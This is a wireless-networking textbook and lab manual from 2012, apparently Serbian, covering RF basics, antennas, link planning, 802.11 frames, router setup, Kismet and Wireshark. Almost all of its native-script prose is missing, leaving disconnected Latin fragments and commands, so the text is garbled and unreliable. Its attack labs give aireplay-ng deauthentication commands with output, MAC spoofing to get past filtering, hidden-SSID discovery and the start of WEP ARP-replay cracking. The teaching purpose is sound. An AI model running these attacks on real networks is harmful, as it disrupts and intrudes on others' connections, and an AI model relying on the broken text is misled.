
, , ,

, 2012.
: , ,
,

: ,

: , ,
,

: 55

CIP
,

621.396 :004(075.8 )(076)

:
/
. . . [ .] . - :

, 2012 ( : ) . - 161
. : . ; 29 cm

55. - : . 160.

ISBN 978-86-7982-142-3
1. , , 1952- []
) -

COBISS.SR-ID 194074636


.
11 , .

, 2012.

1.
1.1
1.2
1.3
1.4
1.5
1.6
1.7
1.8
1:
2.
2.1
2.2
2.3
1:
2:
3.
3.1
3.2
3.3 LINUX
3.4
3.5
3.6
3.7
3.8
4.
4.1
4.2
4.3
4.4
4.5
4.6
4.7
4.8 MAC
5.
5.1
5.2 BACKTRACK
1: BackTrack
2:
3: Linux
5.3
4:
5.4 KISMET
5: Kismet
6: Kismet
5.5 WIRESHARK
5.6
5.7 MAC
5.8
5.9
5.10
7:
5.11 IEEE 802.11
6.
6.1
6.2 DOS (DENIAL-OF-SERVICE)
DoS
1:
2:
3:
6.3
4:
6.4 MAC
5:
7. WEP
7.1
7.2 WEP
7.3
7.4 WEP
7.5 WEP
ARP
1: 64- WEP
2: 128- WEP
8. WPA/WPA2
8.1
8.2 WPA/WPA2
WPA-PSK WPA2-PSK
8.3 WPA-PSK WPA2-PSK
1: WPA
8.4 WPA-PSK/WPA2-PSK
9.
9.1
9.2
9.3
1:
2:
10.
10.1
10.2 WPA/WPA2-ENTERPRISE
RADIUS
1: WPA2-Enterprise
11. MIKROTIK ROUTERS
11.1 MIKROTIK ROUTEROS
11.2 MIKROTIK
11.3 MIKROTIK
1: MikroTik
I

.

, , .
.
I

1.
1.1

.
,
,
.
.
1,
.
:

=
:
f ,
c ,
.

GSM 900MHz, 33cm.
, 2,4GHz,
12,5cm. , ,
.
, ,
:
, .

, .

, .

,
. FM .
88MHz 108MHz,
.
5m, 5mm,
. , 50m (
) .
.

1 ,
, ,
.

,
. ( ),
(
). , FM (88MHz -108 MHz)
, ( GSM 900MHz
1800MHz) . FM
GSM-, GSM .
( )
( , )
, (. QPSK, 8PSK).

1.2

,
. .

1.1 : ) )

.
( ) , 1.1,
(1 + 1 = 2).
2. ,
, 1.1,
(1 + (-1) = 0). 3.
,
RF4 ( ).

.

2 Constructive interference
3 Destructive interference
4 Radio Frequency


, ,
.
, .
.

, .


.
.
.
:
.
.
.
.

(
).
: ,
, , . -,
.
-.
- .
.
.
. ,
.
2,4GHz,
(
2,4GHz). -
.

- . o
.
. -
, .

- ( ) 5
. -
.

1.2 : ()

. ,
, .
, , ,
.
( 1.3) .
( 1.3) --
- .

1.3 : ) - )

5 Reflection


()
6( ).
.

1.4 :

,
, .
:
. , , ,
( 1.5). ,

.

( )
. ( 1.6).

6 Shadowing

1.5 :

.

, .
.

1.6 :


, ,
(7) . (
1.7). , , 10cm 20cm,
(, ,
...) .

7 Scattering


1.7 :

,
:

, ,

.
,
. 1.8
8 (
).
.

1.8 :


.
, 1.9.

1.9 :

8 LOS Line of Sight

,
.
.
.

. (
)
, ,
.
,
n/2, n .
60%
.
:

:
rn n-
d1
d2


10km, 2,4GHz.
17,66m. 28GHz,
5,17m. 60%
,
10,59m
.
6,36m.

1.10
. (
),
. 9 (
) .
, .

9 Multi-path propagation



. ,
,
.
10. GSM 16us
( ),
5km .

1.10 :


.
, ,
.
, .
, .

.
1.10
. .
, , e
.
. 20%
.
-
. ,
.

1.3

,
.
.

10 Delay spread


(dB).
. , ,
, , .

= 10 [ ]

N , P1 , P2
( ).
, (P2) 1W, (P1)
0.5W, 3dB. , :
0,5
10 = 3,01
1
.
3dB 50%
. , 3dB 100%
.
1.1 P1/P2:

3dB 2
10dB 10
20dB 100
30dB 1.000
40dB 10.000
50dB 100.000
60dB 1.000.000
1.1 : dB

,
, . 1mW. dBm,
:

= 10
1

.

1.4


, .
.
, .
.


, :
, , , .
.

.
.
. ,
.
, dBi.
,
dBd. :
0dBd = 2,15dBi.
.
(elevation, E-plane) (azimuth, H-plane) .
,
.
1.11 .

1.11 :

,
() ,
. , ()
.

(). ,
.
.

. 1.12 .


1.12 : Yagi


. (. )
.
Marconi .
1.11 Yagi
.

. .
: ( 1.13), ( 1.13)
( 1.14).
.
.
.


1.13 : ) )


.
.

1.14 :

, .
.
.



.
1.2
.
, .
.

(. ).

-
0dB
20dB
3 dB
(45) 3 dB
20 dB
0 dB
3 dB
(45) 3 dB
( ) ( ) 20 dB
( ) ( ) 0 dB
( ) ( ) 0dB
1.2 : -


.
,
, , .

.
.
: () , , Yagi
.
2,2 dBi .
.
.
, 1.15.


1.15 : -

, 360
.
, , ,
.
,
.
Cisco AIR-ANT2485P-R 8,5dBi.

.
, 1.16.

1.16 :

1.17
.


1.17 : AIR-ANT2485P-R

.
AIR-ANT2485P-R 1.3.
8.5dBi

H-plane 66
E-plane 56
RP-TNC

1.3 : AIR-ANT2485P-R

Yagi .
Yagi-Uda, .
1.18.
.


1.18 : Yagi

Yagi Cisco AIR-ANT1949.


. ,
.
. Yagi
. , Cisco Yagi ,
.

1.19 : AIR-ANT1949

AIR-ANT1949 1.4.
13.5dBi

H-plane 30
E-plane 25
RP-TNC
/
1.4 : AIR-ANT1949


( 1.20) 100
. -
, . Cisco AIR-ANT3338
40km 2Mb/s.
54Mb/s 8km.

1.20 :

21dBi

H-plane 12
E-plane 12
RP-TNC

1.5 :

, ,

. ,
. .
( 1.21) .


1.21 :

20m,
18,
:


126m .

( 1.22).


1.22 :

=
( + )

15.
15 45m.

1.5

HF
(3MHz 30MHz). (), (),
( 1.23)

1.23 :


.
( ).
. . ,
() .
, .
11. , ,
(dB/m).
.
, . , ,
. ,
,
. :
. .
,
.
, .

.
. (30MHz
300MHz). .

RG58.
, CB12 ( , . -) VHF .

RG213. CB HF . RG-213
.

Heliax ( Foam) ,
. Heliax ( 1.24) ,
LMR . LMR400 ( 1.24) LMR600
Heliax .

1.24 : ) Heliax )LMR400

11 Skin effect
12 Citizens' Band radio


,
.

1.6

, ,
. (
), , .
.
( ),
.

, .
1.25.

1.25 :

()
. . ,
(TransverseMagnetic), ,
. , (TransverseElectric),
,
. . 10, 11, .
, , .
( ). /2
. , Y ,
.
.

() ().
( )
, .
.



1.26 :

1.7



, , .
,
.


.
.
BNC 40- . BNC Bayonet
Neill Concelman, Paul
Neill and Carl Concelman.
. BNC
( RG58 RG-179 RG-316).

GHz.
,
10Base2 .
1.27 BNC
B .

1.27 : BNC

TNC Neill Concelman.


BNC C
. ,
TNC

12GHz. 1.28 TNC . TNC Threaded Neill
Concelman.


1.28 : TNC

'N' ( N Neill, 'Navy'- )


. 18 GHz.
. 1.29 'N' .

1.29 : N

SMA 60- . SMA


SubMiniature version A.
18 GHz. 1.30 SMA
.

1.30 : SMA

SMB - SubMiniature version B. .


4 GHz. 1.31
SMB .


1.31 : SMB

MCX 80- .
SM 30% .
6 GHz. 1.32 MCX
. (. pigtail),
.

1.32 : MCX

1.8


:
(dBm) = (dBm) + (dB) (dB)
: ,
, , ,
, .
,
:
PRX = PTX + GTX - LTX - LFS - LM + GRX - LRX
:
PRX (dBm),
PTX (dBm),
GTX (dBi),
LTX ( , ) (dB),
LFS (dB),

LM , , ... (dB),
GRX (dBi),
LRX ( , ) (dB).

:
4
= 20 log

:
L ,
,
d .

:
= 32,45 [dB] + 20 log( [MHz]) + 20 log( [km])
= 27,55 [dB] + 20 log( [MHz]) + 20 log( [m])
= 36,6 [dB] + 20 log( [MHz]) + 20 log( [mile])

.
.
(dB) = (dBm) (dBm)

. 1.6
.




(dB)
(%)
90 8
99 18
99,9 28
99,99 38
99,999 48
1.6 :


, .
.

.


:
: 5 km
: 5,8 GHz
: -
-: ( 100 mW,
- 88 dBm, 18 dBi, 2
dB)
100mW , 20 dBm.
:
= 32,45 + 20 log(5,8) + 20 log(5) = 121.67 dB

:
PRX = PTX + GTX - LTX - LFS + GRX - LRX
20 dBm + 18 dBi - 2 dB -121,67 dB + 18 dBi - 2 dB
= -69,8 dBm
, 18,2 dB.
99%
, .

1:

50km. MikroTik RBSXTG-5HnD.
. 99%
.

II


.

.
RadioMobile -
-.
II

2.

2.1

,
.

-.
-, , -
, .
-,
.

RadioMobile. ,

.
Roger Coudé,
13. RadioMobile online
,
.
RadioMobile :
20MHz 20GHz.
Longley-Rice ITS14-.
.

.
( ,
, , , ...).

- ( - ,
, ...).

RadioMobile .
- .
-.

13 http://www.cplus.org/rmw
14 International Telecommunications Society


2.2 -

-
- .
:
1. ,
2. ,
3. ,
4. -,
5. -,
6. - ,
7. .

RadioMobile
.
: SRTM15, DTED16, GTOPO3017, ...

(File/Map Properties).

2.1 :

15 Shuttle Radar Topography Mission


16 Digital Terrain Elevation Data
17 Global 30 Arc Second Elevation Data Set


( ),
. ( 2.1),
40004000 , 20
( 2.2).

2.2 :

Extract

( 2.3).
.


2.3 :

.
.
Google Maps, Yahoo Maps
.
Edit/Merge pictures.
Google Maps ( 2.4)


2.4 : Merge pictures

Operation, ,
. 2.5
Draw. .

2.5 :



.
(File/Network properties/Parameters)
( ), - ,
.
802.11g-TT, -
802.11g .
2400MHz 2495MHz ( 2.6).

2.6 :

(File/Network properties/Topology),
(master), (slave)
(). ( 2.7).


2.7 :

- (File/Network properties/System)
. - .
.
- ,
.
- Kosutnjak-Master,
2.8.


2.8 : -

:
: Arena-Klijent
: 100mW
O : -89dBm
: 0,4dB
: Yagi
: 26dBi
: 25m

-.
,
.
(File/Unit properties),
Toranj-Kosutnjak.
( 2.9).


2.9 :


Arena.

- a, -
e (File/Network properties/Membership). -
Kosutnjak-Master Toranj-Kosutnjak, -
Arena-Klijent Arena ( 2.10).


2.10 : -

- ,
(slave). -
2.10 Antenna direction
- a .
,
, - .

(Tools/Radio Link).
2.11.


2.11 :


.
. -
, .
:
Azimuth -
Elev. angle
Obstruction
Worst Fresnel
Distance
PathLoss dB
E field
RX level
RX Relative
Google Earth (Edit/Export to/Google Earth),
( 2.12).


2.12 : Google Earth

2.3 -


-.
.
- Arena-Klijent
, 26dBi 19dBi
.
(Tools/Radio coverage/Single polar).
( 2.13).
- , -
Arena-Klijent. ( ,
),
-.
.
.


2.13 :

( Draw), 2.13
- . Yagi ,
.


2.14 :

1: -
Radio Mobile - 2.4GHz
. Radio Mobile- .
100km, 4000x4000 .
50m.
.
:
:
TP-Link TA-2448 -
:
TL-WA801ND
0.5dB
?
?
, ?


2: -
Radio Mobile - 2.4GHz
. Radio Mobile- .
100km, 4000x4000 .
20m.
.
:
:
TP-Link TA-2448 -
TL-ANT2415D -
:
TL-WA801ND
1.5dB
?
?
, ?

III


.
.
, .
III

3.

3.1

I 802.11.
- 2,4GHz 5GHz.

, .
, , 1Mb/s
2Mb/s a FHSS (Frequency Hopping Spread Spectrum) DSSS (Direct
Sequence Spread Spectrum).

:
802.11a, 54 Mb/s, OFDM
5GHz (5,47GHz - 5,725GHz).
,
.
802.11b, 11 Mb/s, 802.11
2,4GHz , .
DSSS .
802.11g, 54Mb/s, OFDM 2,4GHz
. 802.11b b/g.
802.11n, 600 Mb/s. 2009.
. 802.11n MIMO (multiple-input and
multiple-output) , 2,4GHz, 5GHz,
Channel Bonding-, -
20MHz a 40MHz.
,
, .

,
.


3.2

802.11b 802.11g ,
14 22MHz.
. 11 ,
13 . 14. .
.
5MHz. ,

.
5 .
, 1, 6, 11.

3.1 : 2,4GHz

3.3
Linux

Linux
() . A
(ethx),
( ath0 Atheros ).
MLME (MAC sublayer
management entity) ,
. Linux
API a ,
mac80211, , cfg80211.

. wlanx.
,
:
:
/:
:
iwconfig
:

?
( IEEE802.11?). ?
?
.
:
iwlist channel
:
?
?
?
,
.

3.4

,
E.
BSS (Basic Service Set) -
.
BSS.

( , ) (Extended Service Set).
(DS).

.
, DS .
(Access Point).

. .

, ,
. . ,
(Managed)

.

,
, .


. ,
, ,
,
.
(Independent - IBSS) Ad-Hoc .
(Ad-Hoc)
.
( AP, Managed, Ad-Hoc)
() (Monitor, rf-mon).
(. Wireshark,
Kismet).
.

Monitor .
Managed Ad-Hoc, AP
Monitor .

3.5


. , , CSMA/CD
. (CD) .
E .
IEEE 802.11 , , ,
, .
.
IEEE802.11 CSMA/CA (Collision Avoidance).
, .

,
,
CSMA/CA.
(Acknowledgement Frame).
, :
RTS CTS .

.
PS-Poll (Power Save Poll). IEEE 802.11
.

.


CF-End, CF-End+CF-ACK .
, .
DCF (Distributed Coordinated
Function). (Carrier Sense),

, .
DCF,
(Contention Free).
PCF (Point Coordinated Function).
DCF PCF
, CF-End, CF-End+CF-ACK
DCF.

:
Beacon .
Probe request () Probe response () ,
,
.
Authentication Deauthentication
.
Association, Disassociation, Reassociation
.
ATM .

3.6


Wireshark, Monitor .
.
Wireshark, nefiltrirano.cap
, .
,

.
.
:
Statistics Wlan Traffic...
.
SSID (Service Set ID) ,
.


, labnet viser,
.
SSID .

BSSID (Basic Service Set ID).
BSSID . BSSID MAC .
Wireshark 24 (OUID- )
).
ESSID (BSSID) Beacon
. .

.
.
Wireless Traffic. (File/Close) nefiltrirano.cap.

.
(File/Open) filtrirano.cap
1 2 (Beacon ):
.
(fixed parameters)
(tagged parameters).
.
:
Beacon ad-hoc BSS?
Beacon ?
SSID ?
?
?
(RSN18)?

Probe Request ( 3).



SSID. SSID (SSID=Broadcast),
.

18 Robust Security Network


Probe Response ( 4).


.
Duration . IEEE 802.11
. CSMA/CA
. 802.11
,
.
.
(Acknowledgement) ( 5).
802.11. ,
, .
.
Probe Response ( 8
9).
:
( 10).
.
( 12).

.
: (Open System), WEP (Wired Equivalent Privacy).
.
, WEP, (
)

. WEP
.
IEEE802.11i .
,
. , IEEE802.11i
.
(Association Request,
Association Response) ( 14-17).
.
. .

.


WEP ,
, . WEP
IEEE 802.11-2007.
IEEE802.11i
. (Robust
Security Network - RSN) Beacon Probe Response
(RSN information Tagged parameters).
RSN information Beacon ( 32).
IEEE 802.11i
.
WPA WPA2 (Wireless Protected Access).
IEEE 802.11i, WPA
WPA2, je .
WPA TKIP (Temporal Key Integrity Protocol) .
TKIP WEP,
. WEP -
.

WPA2 (Counter Mode with Cipher Block Chaining Message Authentication Code CCM)
. 802.11
RSN .
o
, IEEE 802.1x .
IEEE 802.1x
EAP19 ,
.
, .
WPA Enterprise WPA2 Enterprise,
.

, , (Pre
Shared Key - PSK). WPA Personal WPA2 Personal,
.
RSN (Robust Security
Network) IEEE802.11i,
WPA2 Enterprise.
802.1x (Request, Identity, Response, Identity).
?

19 Extensible Authentication Protocol


Ko ?
EAP .
? ( 38)
:
.
EAP-Success . ( 80)
RSN (4-way handshake)
. . ( 82-88)
,
.
. DHCP
.
Wireshark:
, Flow Graph.

3.7 .

Beacon , Probe
(ESSID) ,
(BSS), .
Linux , Network Manager .
, iwlist.
:
iwlist scanning
labnet (ESSID: labnet)
MAC , (BSSID)?
Ad-Hoc ?
- ?
, , ?
?
?
?


3.8

,
. dBm, mW
1mW.
:
:
iwlist txpower
?
,

.
.
:
iwlist scanning
wavemon,
.

wavemon.
:
xterm
. xterm :
wavemon
:
.
.
.
. F2
, , /.
F2. .

.

IV


.
.
IV

4.
4.1

,
. TP-Link
TP-Link WR841N.
,
, .
SOHO20 .
, ,
.
.
.
IP .
DHCP .
web
.
:
http://192.168.1.1
admin admin

4.2

IP 192.168.1.1, (
) , .


.
, . ,
Network, LAN 4.1.

20 Small Office Home Office


4.1 : IP

4.3

Network, Wan, ,
( ).

4.2 : IP

4.2 .


4.4

.

.

4.3 : DHCP

DHCP (
, , DNS ).
(Default Gateway). DHCP Clients List,
, .
,
. ,
. FTP
,
. Address Reservation ,
MAC IP . 4.4
.


4.4 :

4.5

Forwarding.
4 , ,
Virtual Servers. 4.5 -
.

4.5 :



. , .
, (.
), .
, .
4.5, , IP ,
, . Forwarding,
DMZ (Demilitarized Zone). IP
.
,
, .

. 4.6
.

4.6 : IP

4.6

Wireless, Wireless Settings ( 4.7):


BKS-1 ( BKS-2 ,
BKS-3 , ...).
.
Channel 1 (6 , 11 ).
Mode 11bgn mixed.
Automatic.


300Mbps.

4.7 :


(SSID), .

4.7

Wireless, Wireless Security.


.
WEP (40/64-bit,
104/128-bit 128/154-bit). ,
.
- ASCII .
: WEP 802.11 2007.
. ,
. 4.8
WEP-.


4.8 : WEP

WPA-PSK WPA2-PSK ,
.
. WPA2 SOHO
( 4.9):
Version WPA2-PSK.
Encryption AES.
PSK Password .


4.9 : WPA-PSK/WPA2-PSK

WPA/WPA2
,
. WPA-PSK/WPA2-PSK
, WPA/WPA2 . WPA/WPA2
WPA/WPA2 Enterprise ,
. RADIUS
.
WPA-PSK/WPA2-PSK WPA/WPA2 Enterprise
/, . 4.10
WPA/WPA2 Enterprise .
RADIUS .


4.10 : WPA/WPA2 Enterprise

4.8 MAC

MAC .
( )
( 4.11).


4.11 : MAC

Wireless Advanced ( 4.12).

4.12 :

:
Transmit Power - .
Beacon Interval -
.
RTS Threshold RTS/CTS
Fragmentation Threshold .


Wireless Statistics
( 4.13).

4.13 :

V

Linux -
Back Track, .
Kismet .
Wireshark .
V

5.
5.1

Linux
BackTrack. BackTrack je Ubuntu, Debian
Linux-a. ,
, .
KDE (K Desktop Environment) GNOME
,
. BackTrack
Auditor Security Linux-a WHAX ( Whoppix).
21,
BackTrack 5 R3 . BackTrack
, LiveDVD-a
USB .

5.2 BackTrack

BackTrack Live DVD/USB- BIOS-


. startx
.

1: BackTrack
BackTrack 5 R2 Linux .

2:
:
Start / System / Konsole
:
ifconfig
?
, ,
:
ifconfig -a
?
IP ?
(. wlan0)
:

21 http://www.backtrack-linux.org


ifconfig wlan0 up
:
ifconfig wlan0 down

IP . IP
DHCP .

.
DHCP , ,
, IP .

3: Linux
:
Start / System / Konsole
:
dhclient eth0
eth0
DHCP .
DHCP , :
ifconfig eth0
?

:

:
IP - ifconfig < >
<> netmask < >, (. ifconfig eth0 10.0.0.100 netmask 255.0.0.0
- ifconfig eth0 10.0.0.100/8);
route add
default gw < >, (. route add default gw 10.0.0.1);
route, , ;
DNS resolv.conf
/etc ,
Linux (. nano /etc/resolv.conf
nameserver 10.0.0.10); DNS
- cat /etc/resolv.conf.

5.3

RFMON (Radio Frequency Monitor)


.


(promiscuous) ,
,
Ad-hoc .
,
.

.
.

Ad-hoc . Windows
, Windows Vista Windows 7
Windows .

Windows . Linux
802.11 .
airmon-ng
. , (Managed)
. :
airmon-ng <start | stop> < > [. ]

airmon-ng <check | check kill>
start | stop ,
;

;
check airmon-ng ;
check kill ;
airmon-ng
.

4:
:
Start / System / Konsole
,
,
:
iwconfig
?


(IEEE802.11?). ?
?
:
airmon-ng start wlan0
,
:
iwconfig
mon0 .

:
airmon-ng stop mon0

, .

5.4 Kismet

Kismet IEEE 802.11 ,


(sniffer) (Intrusion Detection System).
rfmon, monitor .

. , ,
.
,
Kismet , .

.

, .
Kismet ,
, Beacon
.
,
Wireshark,
(Airsnort).
.
. ,
.
.


5: Kismet
Kismet BackTrack Linux- :
Start / Backtrack / Radio Network Analysis / 80211 / All / Kismet
kismet, Enter.
( 5.1).

5.1 : Kismet


, .
wlan0 [Add],
( 5.2).

5.2 :



.
5.3 .

5.3 : Kismet

. autofit
.
Sort ( 5.4).

5.4 :


.
?
,
.
,
. 5.5 .

5.5 :

.
. Kismet

. kismet_ui.conf ,
decay 3 .
!,
( 3 ), 5.5
HiHaHo;
..
( 6 ), 5.5
energetics;
.
( 6 ),
5.5 rakac.
(SSID) .
Beacon (. SSID-a cloaking SSID),
, <no ssid> .
:
A (Access Point) .
D (Data Network)
.


H (Ad-hoc) Ad-hoc .
P (Probe Request) .
Ch :
802.11b/g , 1-13 (1-14 );
802.11a , 36, 40, 44, 48, 52, 56, 60, 64, 149, 153, 157
161.
Pkts .
Size .
, Kismet
.
. :
WEP WPA
.

.
.

(SSID).

.
5.6.
Enter i.


5.6 :

Kismet .
Client list
Windows . 5.7.

5.7 :

/
Channel details Windows .
5.8 .


5.8 : /

Kismet .
()
. Configure channel
Kismet ( 5.9)
.
(dwell ).

5.9 :


. .
dump Wireshark.


6: Kismet
Kismet .

.
?
.
.
viser labnet.
.
?
.
/ .
Wireshark.

5.5 Wireshark


.
Wireshark - (Capture filters)
- (Display Filters). -

.

. Wireshark
IEEE 802.11 , 802.11
( ).

5.6


(BSSID). BSSID MAC .
,
.
,
.
:
wlan.bssid eq <MAC >


5.7 MAC


( MAC 00:09:5b:e8:c4:03):
wlan.sa eq 00:09:5b:e8:c4:03
MAC ipconfig/all getmac ( Windows
), ifconfig ( Linux ).

, :
wlan.bssid eq 00:11:92:6e:cf:00 and wlan.sa eq 00:09:5b:e8:c4:03

5.8

.
type subtype IEEE 802.11 .
Wireshark Beacon ,
Beacon .

10 (PS)-Poll
11 (RTS)
12 (CTS)
13 (ACK)
14 (CF)-End
15 CF-End + CF-Ack
5.1 :


0 -
1 -
2 -
3 -
4 -
5 -
8 Beacon
10
11
12
5.2 :

Beacon (type=00),
8 (subtype=00).
:
!(wlan.fc.type eq 0 and wlan.fc.subtype eq 8)

()
Beacon .
, Wireshark
type subtype .
Beacon .
:
wlan.fc.type_subtype ne 8
5.3 .

5.9

Beacon
, .

.
:
wlan.fc.type_subtype eq 32

:
wlan.fc.type eq 2
, ICMP (ping), NULL
, ...

5.10


( ).
. IEEE 802.11
protected bit 1,
(WEP,TKIP CCMP).
:
wlan.fc.protected ne 1
.
:
wlan.fc.protected ne 1 and wlan.fc.type eq 2


7:
Wireshark .

.
300 .
.
/ :
/
Management frames wlan.fc.type eq 0
Control frames wlan.fc.type eq 1
Data frames wlan.fc.type eq 2
Association request wlan.fc.type_subtype eq 0
Association response wlan.fc.type_subtype eq 1
Reassociation request wlan.fc.type_subtype eq 2
Reassociation response wlan.fc.type_subtype eq 3
Probe request wlan.fc.type_subtype eq 4
Probe response wlan.fc.type_subtype eq 5
Beacon wlan.fc.type_subtype eq 8
Announcement traffic indication map (ATIM) wlan.fc.type_subtype eq 9
Disassociate wlan.fc.type_subtype eq 10
Authentication wlan.fc.type_subtype eq 11
Deauthentication wlan.fc.type_subtype eq 12
Action frames wlan.fc.type_subtype eq 13
Block ACK Request wlan.fc.type_subtype eq 24
Block ACK wlan.fc.type_subtype eq 25
Power-Save Poll wlan.fc.type_subtype eq 26
Request to Send wlan.fc.type_subtype eq 27
Clear to Send wlan.fc.type_subtype eq 28
ACK wlan.fc.type_subtype eq 29
Contention Free Period End wlan.fc.type_subtype eq 30
Contention Free Period End ACK wlan.fc.type_subtype eq 31
Data + Contention Free ACK wlan.fc.type_subtype eq 33
Data + Contention Free Poll wlan.fc.type_subtype eq 34
Data + Contention Free ACK + Contention Free Poll wlan.fc.type_subtype eq 35
NULL Data wlan.fc.type_subtype eq 36
NULL Data + Contention Free ACK wlan.fc.type_subtype eq 37
NULL Data + Contention Free Poll wlan.fc.type_subtype eq 38
NULL Data + Contention Free ACK + Contention Free Poll wlan.fc.type_subtype eq 39
QoS Data wlan.fc.type_subtype eq 40
QoS Data + Contention Free ACK wlan.fc.type_subtype eq 41
QoS Data + Contention Free Poll wlan.fc.type_subtype eq 42
QoS Data + Contention Free ACK + Contention Free Poll wlan.fc.type_subtype eq 43
NULL QoS Data wlan.fc.type_subtype eq 44
NULL QoS Data + Contention Free Poll wlan.fc.type_subtype eq 46
NULL QoS Data + Contention Free ACK + Contention Free Poll wlan.fc.type_subtype eq 47
5.3 : /

5.11 IEEE 802.11

802.11 .

5.10 : IEEE 802.11

5.4 , Wireshark
.

Frame Control 2 wlan.fc


802.11
.
, 11
.

Version 802.11 wlan.fc.version


.
0.

Type , wlan.fc.type
,
.

Subtype wlan.fc.subtype
.
,
(beacon
frame, authenticate request, disassociate


notice, frame, authenticate request,


disassociate notice...).

DS status To DS From DS wlan.fc.ds


. From DS=1
To DS=0,
. From DS=0
To DS=1,
.
,
Ad-hoc .
,
.

More Fragments wlan.fc.flag



.
.

Retry wlan.fc.retry

.

Power wlan.fc.pwrmgmt
Management ,
.
More Data wlan.fc.moredata

()
.

Protected wlan.fc.protected

.

Order wlan.fc.order
.
.


Duration . wlan.duration


.


.

Address , wlan.da (destination),


. wlan.sa (source),
(
), wlan.bssid (BSSID),
wlan.ra (receiver)
( ,
BSSID).

.

Fragment Number wlan.frag



.

.

Sequence Number wlan.seq


.

.
4095,
.

.

5.4 : IEEE 802.11

VI


. ,
, .
VI

6.
6.1


. IEEE 802.11 ,
:

.
.
.
.
,
.
.

. -
. ,
.

. , 802.11, "" .
, .
.
, .
:
,
.
(poor configuration) .
. ,
.
(poor encryption).

.
.
,
.


6.2 DoS (denial-of-service)

DoS ,
.
, DoS .
OSI
. ,
, .

.
,
.
, .
.
.
jamming-to-signal (J/S), ,
.
,
. ,
, .
J/S , ,
:

:
Pj - ,
Pt - ,
Gjr - - ,
Grj - - ,
Grt - - ,
Gtr - - ,
Br - ,
Bj - ,
Rtr - ,
Rjr - ,
Lj - ,
Lr - .
ERP (Effective Radiated Power) ,
, .

, ,
, . ,
.
.
,
.
WLAN ,
, , ,
. , WLAN ,
. WLAN
.
. ,
,
. , ,
.
OSI
.

DoS

,
.
. ,
(.
), .
802.11 ,
( ).
DoS .
,
MAC .
, ()
.
, ,
.
DoS :
(cloaked SSID);
WPA/WPA2 ;
ARP , WEP . Windows
ARP 22.

22 disconnect


,
.
aireplay-ng.
,
(injection)
. aireplay-ng.

1:
.
:
:
Start / System / Konsole
:
airmon-ng start wlan0
:
iwconfig
, :
aireplay-ng
.
,
aireplay-ng -9 mon0
- -9 aireplay-ng ,
- mon0 .
, :
16:29:41 mon0 channel: 9
16:29:41 Trying broadcast probe requests...
16:29:41 Injection is working!
16:29:42 Found 5 APs
,
:
aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:AE:CE:9D mon0
:
-0
aireplay-ng ;
1 . 0,
;
-a 00:14:6C:7E:40:80 MAC ;


-c 00:0F:B5:AE:CE:9D MAC
, ;
mon0 .
:
10:01:45 Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80)
on channel 1
10:01:45 Sending 64 directed DeAuth. STMAC:
[00:0F:B5:AE:CE:9D] [ 61|63 ACKs]
aireplay-ng ,
aireplay-ng 128 .
64 . [61 | 63 ACKs],
:
[ ACK | ACK
];
1
, ;
.
,
.
MAC ,
, Kismet airodump-ng.

2:
.
:
- SSID spec_lab1 (, spec_lab2, spec_lab3, ...)
- 1 ( 6, 11, ...)
- :
- IP : 172.17.32.100/24
- Default gateway: 172.17.32.1/24
- DNS : 172.16.1.13
1
Manager .
:
airmon-ng stop mon0
:
iwconfig wlan0 essid <SSID>
wlan0 DHCP :


dhclient wlan0
.
,
:
ping <IP >
2 .
airodump-ng .
airodump-ng mon0
Wireshark mon0 .
MAC :
aireplay-ng -0 1 -a < > -c <
> mon0
.
?

802.11 ,
SN. SN 12 .
SN .
, 4095.
. 6.11 SN (599, 600, 601 602).


6.1 : SN

6.2 45 46.
, (
23 - ). SN
MAC .
44 47, SN 637 638, .
MAC
SN 1957 1958, .

23 Broadcast


6.2 :


, .
SN 24.

3:
Wireshark .

6.3

. 25.
(SSID) beacon ,
Probe .

, .
, SSID beacon ,
. ,
, Association

24 Intrusion Detection Software - IDS


25 Hidden, cloaked mode


request SSID. SSID


, , .
Kismet,
SSID .
SSID-a
.
.
()
SSID .
, .
802.11w .
,
802.11-2007 . 802.11w
.
802.11w CCMP/AES .

4:
SSID Beacon (
IV ).
SSID .
.
.
Wireshark mon0 .
MAC .
, Probe request
.
SSID .
oja SSID ?

6.4 MAC


MAC .
MAC .
MAC 26 je /
. MAC ROM
. , RAM ,
RAM .

26 Media Access Control Address


MAC
RAM , .

. MAC
.

5:
(
IV ).
.
MAC
.
MAC :
ifconfig wlan0 down
:
ifconfig wlan0 hw ether <MAC >
:
ifconfig wlan0 up
:
iwconfig wlan0 essid <SSID >
wlan0 DHCP :
dhclient wlan0
.
?

Windows MAC
, NetworkAddress
( 6.3).

6.3 : MAC : 000011112222

VII

WEP

.
WEP
.
, .

7. WEP
7.1

.
802.11,
WEP27. , WEP
.

.
IEEE 802.11 WEP
. WEP
,
.

7.2 WEP


. IEEE 802.11 W :
,
.

. ANY SSID
.

hot-spots.

7.1 :

7.1 :
1. .

27 Wired Equivalent Privacy -


2. .
3. .

WEP .
, 7.2:
1. .
2. 128-
.
3.
.
4. .
5. ,

.
, ,
.

7.2 :


. ,

.

.

7.3

WEP RC4
IV.


XOR ( )
:
C = [ M || ICV(M) ] ⊕ [ RC4(K || IV) ]

:
,
,
ICV(M) ,
,
,
IV - ,
|| - .

7.3 : WEP

WEP 7.3. KeyID, 40- 104-


, .
, 24- (IV) 40- 104-
64-, 128-
. IV ,
.
, CRC28
. CRC-32
. CRC-32
.
RC4 CRC-32 ,
:
http://en.wikipedia.org/wiki/Rc4
http://en.wikipedia.org/wiki/Cyclic_redundancy_check
WEP- . RC4
,
.

28 Cyclic redundancy check


IV WEP-,
. , 24 , 2^24
. ,
IV ( ) 99%
12000 . 1 54Mb/s,
12000 .
, 7. 3, IV (
) WEP .
IV .

7.4 WEP

WEP IV
.
Windows WEP
:
1. (Control panel)
.
2. (Properties).

7.4 :


3. ( 7.4)
(Add).
4. SSID, WEP (
7.5).

7.5 :

Linux WEP
:
1. .
2. iwconfig ( 7.6).


7.6 : iwconfig

3. o WEP
ESSID WEP .
:

iwconfig <> ESSID <essid> key < >


: iwconfig wlan0 ESSID lab403 key 33:BB:33:FF:11:11.
4. :

dhclient wlan0

7.5 WEP

WEP :
.
.
.
, , . IV-,
, , .

, , .
WEP Aircrack-ng .
aireplay-ng WEP
:
,
ARP ,
KoreK-chopchop ,
,


Cafe-latte.
ARP

WEP .
aireplay-ng 29.

ARP


IV
.
. ARP ,
, . ARP
broadcast (FF:FF:FF:FF:FF:FF) 68 . ARP

ARP ,
IV.
:
airodump-ng WEP
,
;
